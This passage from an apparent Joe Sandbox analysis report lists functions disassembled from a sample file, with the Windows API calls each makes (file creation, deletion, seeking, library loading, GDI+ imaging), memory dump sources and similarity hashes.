                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 22d1dde4fbc9d629ded88bab5717ca86386bf51545a871c58b7f64165e231d49
                          • Instruction ID: 0dc108ffdfeb7758137f3da06857120f5f18ffe6d5ed342297eeca72e655e65b
                          • Opcode Fuzzy Hash: 22d1dde4fbc9d629ded88bab5717ca86386bf51545a871c58b7f64165e231d49
                          • Instruction Fuzzy Hash: 144165B0805B40DEE726DF7984859E7FBE5FB18300F404A6ED2EE87282CB326554CB11
                          Function 00371380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00371385
                            • Part of subcall function 00376057: __EH_prolog.LIBCMT ref: 0037605C
                            • Part of subcall function 0037C827: __EH_prolog.LIBCMT ref: 0037C82C
                            • Part of subcall function 0037C827: new.LIBCMT ref: 0037C86F
                            • Part of subcall function 0037C827: new.LIBCMT ref: 0037C893
                          • new.LIBCMT ref: 003713FE
                            • Part of subcall function 0037B07D: __EH_prolog.LIBCMT ref: 0037B082
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: ff0220b80cb5e944bc27b1b243f967f3192c2ae1eb38280fc871bff204539dff
                          • Instruction ID: 3dada500cfe96669da77120f2ddd68de3d59760a2887a2f30fa2362fb313864d
                          • Opcode Fuzzy Hash: ff0220b80cb5e944bc27b1b243f967f3192c2ae1eb38280fc871bff204539dff
                          • Instruction Fuzzy Hash: F04142B0805B409EE726DF798485AE7FAE5FB19310F404A6ED2EE87282DB322554CB11
                          Function 0037971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00379EDC,?,?,00377867), ref: 003797A6
                          • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00379EDC,?,?,00377867), ref: 003797DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 33e9b7e6512d11462127d24039aaace7ebd5d96797ca638f434992021cd9c93e
                          • Instruction ID: c1b4e01946b1249cd6eda2c2aa961ce9f97a4d90a4a641c24f27f69f859f8566
                          • Opcode Fuzzy Hash: 33e9b7e6512d11462127d24039aaace7ebd5d96797ca638f434992021cd9c93e
                          • Instruction Fuzzy Hash: C3212870004784EFD7358F64CC86BA7B7ECEB49764F008A1EF1D982191C378AC448B20
                          Function 00379D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                          Download Yara Rule
                          APIs
                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00377547,?,?,?,?), ref: 00379D7C
                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 00379E2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: File$BuffersFlushTime
                          • String ID:
                          • API String ID: 1392018926-0
                          • Opcode ID: 901bbf18cafbd41e7c89e6ee18282ba8cb96c87625508a92b8280cfed9a37132
                          • Instruction ID: 71e7f4ad5b53caa2080ad9b0ebca8e5d936c5861b93ebe790c1d48f3d76803cc
                          • Opcode Fuzzy Hash: 901bbf18cafbd41e7c89e6ee18282ba8cb96c87625508a92b8280cfed9a37132
                          • Instruction Fuzzy Hash: C521E431148286AFC736DE24C451FAABBE8AF52304F058A5EB8D587151D32DDA0CDB51
                          Function 0039A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0039A4B8
                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0039A4C5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AddressProc__crt_fast_encode_pointer
                          • String ID:
                          • API String ID: 2279764990-0
                          • Opcode ID: f2a4b088da41b5d2c74386fc4506127f33148db1d662f2ce926daadf919589aa
                          • Instruction ID: cea85bc1128b270f363f43832d0a2c80f38eecd9718897972d11506f1685f623
                          • Opcode Fuzzy Hash: f2a4b088da41b5d2c74386fc4506127f33148db1d662f2ce926daadf919589aa
                          • Instruction Fuzzy Hash: EE112933A01A219B9F27DE2EEC4486A73999B81320B1B4320FD15EB354EB74EC41C7D2
                          Function 00379B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00379B35,?,?,00000000,?,?,00378D9C,?), ref: 00379BC0
                          • GetLastError.KERNEL32 ref: 00379BCD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: c9bba2bc839fd6caa01b8ca5244ce9b767bf1d1dd178bc223a8979f5667dd90b
                          • Instruction ID: 1a7f74cf03282aa54caf89f2fff32bc9284649d0bc8b485928bdcbe87acf1f7e
                          • Opcode Fuzzy Hash: c9bba2bc839fd6caa01b8ca5244ce9b767bf1d1dd178bc223a8979f5667dd90b
                          • Instruction Fuzzy Hash: 1D0108313042059F8B2ACE25AC84A7EB75DEFC1321B10C72FF81B87280CB38D8059721
                          Function 00379E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00379E76
                          • GetLastError.KERNEL32 ref: 00379E82
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer
                          • String ID:
                          • API String ID: 2976181284-0
                          • Opcode ID: 8299bfd0dfc0780042a45fbe92a4dacc75e94241ec0208da859db9e2e35e627c
                          • Instruction ID: 2f0b2974cbcce91d050766a814302471e8f3e1a622ed14569ab248813f9ad7be
                          • Opcode Fuzzy Hash: 8299bfd0dfc0780042a45fbe92a4dacc75e94241ec0208da859db9e2e35e627c
                          • Instruction Fuzzy Hash: FB01B5713052005BEB36DE29DC89B6BB7DD9B85724F15CA3EF14AC3A80DA39DC488711
                          Function 00398606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00398627
                            • Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A
                          • HeapReAlloc.KERNEL32(00000000,?,?,?,?,003B0F50,0037CE57,?,?,?,?,?,?), ref: 00398663
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Heap$AllocAllocate_free
                          • String ID:
                          • API String ID: 2447670028-0
                          • Opcode ID: 4d1d705fe4501ff0aeb485a06389550d7181fab1eaeabe51a2f3497f786a67a9
                          • Instruction ID: 82c4c582a8a8f6a70ef529baa57c5990988c91045e94a1206b09e653b841cd9a
                          • Opcode Fuzzy Hash: 4d1d705fe4501ff0aeb485a06389550d7181fab1eaeabe51a2f3497f786a67a9
                          • Instruction Fuzzy Hash: D3F09032206115AADF232B26AC00F6F376C9FD3BB0F264126FA549E591DF30DC0195A5
                          Function 00380908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(?,?), ref: 00380915
                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 0038091C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Process$AffinityCurrentMask
                          • String ID:
                          • API String ID: 1231390398-0
                          • Opcode ID: efa93778fd05f9eb7c8aa67d72347cf3002fbb76f3bbf081b86625d6d67596c0
                          • Instruction ID: 77d2a686502e48ae9bb09fb94d179da0a1bbca65c4c4063a298c37f144c371b9
                          • Opcode Fuzzy Hash: efa93778fd05f9eb7c8aa67d72347cf3002fbb76f3bbf081b86625d6d67596c0
                          • Instruction Fuzzy Hash: EBE06D33A11209AB6F4EEAB49C048BA729DEB4531472241A9E807D3211EA30DE0987A0
                          Function 0037A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A458
                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A489
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: ae76c8c5b697704ee19b4808c092df8002c63489692024e1bff4ffdcf0fcba96
                          • Instruction ID: 7833b7a97ebf731ecd3384ba1d26205c0a4f46695a15675a4725b1487c869ac7
                          • Opcode Fuzzy Hash: ae76c8c5b697704ee19b4808c092df8002c63489692024e1bff4ffdcf0fcba96
                          • Instruction Fuzzy Hash: BCF08C312442097ADB12AE60DC05BDA776CAF05385F04C051BC8C86261DB768AA8AA50
                          Function 0038D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemText_swprintf
                          • String ID:
                          • API String ID: 3011073432-0
                          • Opcode ID: 57b68dc4ec05ac5a7dd434ac2540271138dabca3f65c20c44c028cb9ec11ede3
                          • Instruction ID: b549f705a9bf2e859463006f7917dd55ea33281cd587000b13c701208ab2155b
                          • Opcode Fuzzy Hash: 57b68dc4ec05ac5a7dd434ac2540271138dabca3f65c20c44c028cb9ec11ede3
                          • Instruction Fuzzy Hash: FCF0E57150134C7AEB23BBB09C06FAA376CAB05746F0406D7B704AB0B2DE756A608772
                          Function 0037A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteFileW.KERNELBASE(?,?,?,0037984C,?,?,00379688,?,?,?,?,003A1FA1,000000FF), ref: 0037A13E
                          • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0037984C,?,?,00379688,?,?,?,?,003A1FA1,000000FF), ref: 0037A16C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0
                          • Opcode ID: 90921c1586689fa8fe726286b68358e3c74f2ffa3d980068f18b38b5d26ae32b
                          • Instruction ID: 245fcc1d8e372fba87729faa9f295cf2f65a6dba3a7d4f010c65c8b254ef7c6c
                          • Opcode Fuzzy Hash: 90921c1586689fa8fe726286b68358e3c74f2ffa3d980068f18b38b5d26ae32b
                          • Instruction Fuzzy Hash: 58E09B3554020867EB129F60DC41FE9775CAB05382F844065B988C7060DB619D94AF50
                          Function 0038A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          • GdiplusShutdown.GDIPLUS(?,?,?,?,003A1FA1,000000FF), ref: 0038A3D1
                          • CoUninitialize.COMBASE(?,?,?,?,003A1FA1,000000FF), ref: 0038A3D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: GdiplusShutdownUninitialize
                          • String ID:
                          • API String ID: 3856339756-0
                          • Opcode ID: fdd25979cf30e81d15e758ecdd645c9758df74ed8b0ec52c1d6adc3ab6194298
                          • Instruction ID: 42f3dace1065c567a9304241b041df4f8a6fc42cfbce7a59221f2f14f165057c
                          • Opcode Fuzzy Hash: fdd25979cf30e81d15e758ecdd645c9758df74ed8b0ec52c1d6adc3ab6194298
                          • Instruction Fuzzy Hash: EFF06532558655DFC712EB4DDC05B55FBACFB49B20F04476AF41983760CB746800CB91
                          Function 0037A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,?,?,0037A189,?,003776B2,?,?,?,?), ref: 0037A1A5
                          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0037A189,?,003776B2,?,?,?,?), ref: 0037A1D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: ecaa5059cbac81aa20dff385c9755bfa325c3ba980a76f0d9bc1c5068f0cc9e5
                          • Instruction ID: d00b88f6e9764515fb4476e1d5e0d7a0de7234cf9f72523a9e40cf5c478558ef
                          • Opcode Fuzzy Hash: ecaa5059cbac81aa20dff385c9755bfa325c3ba980a76f0d9bc1c5068f0cc9e5
                          • Instruction Fuzzy Hash: 88E0D8755001285BDB32EB68DC05BD9B76CEF093E1F0182A1FD49E72A0D7709D449BE0
                          Function 00380085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
                          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: DirectoryLibraryLoadSystem
                          • String ID:
                          • API String ID: 1175261203-0
                          • Opcode ID: 7156c00833ddf96439f323dd7ef07f820ab1b690ee28abf1044d052f57633028
                          • Instruction ID: 6cd691734f80d4ad6d91a760f9bec03e70e0767d60d72831af56f943995818d7
                          • Opcode Fuzzy Hash: 7156c00833ddf96439f323dd7ef07f820ab1b690ee28abf1044d052f57633028
                          • Instruction Fuzzy Hash: 87E0127690121C6ADB62AAA49C05FD6B76CEF0A382F0400A5BA49D3114DA749A448BA0
                          Function 00389B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                          Download Yara Rule
                          APIs
                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00389B30
                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00389B37
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: BitmapCreateFromGdipStream
                          • String ID:
                          • API String ID: 1918208029-0
                          • Opcode ID: 356f7ba3b9d49227799dda31cd45c4c298beb4dc94bbc11a318333da0f637bc1
                          • Instruction ID: e109ac42149834c6a915041e178664fff1e3d59a5e3246f58253b3255722d368
                          • Opcode Fuzzy Hash: 356f7ba3b9d49227799dda31cd45c4c298beb4dc94bbc11a318333da0f637bc1
                          • Instruction Fuzzy Hash: FBE0ED71901318EFCB12EF98D9017AAB7ECEB49321F10849BE89597610D7B16E04AB91
                          Function 0039215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039329A: try_get_function.LIBVCRUNTIME ref: 003932AF
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0039217A
                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00392185
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
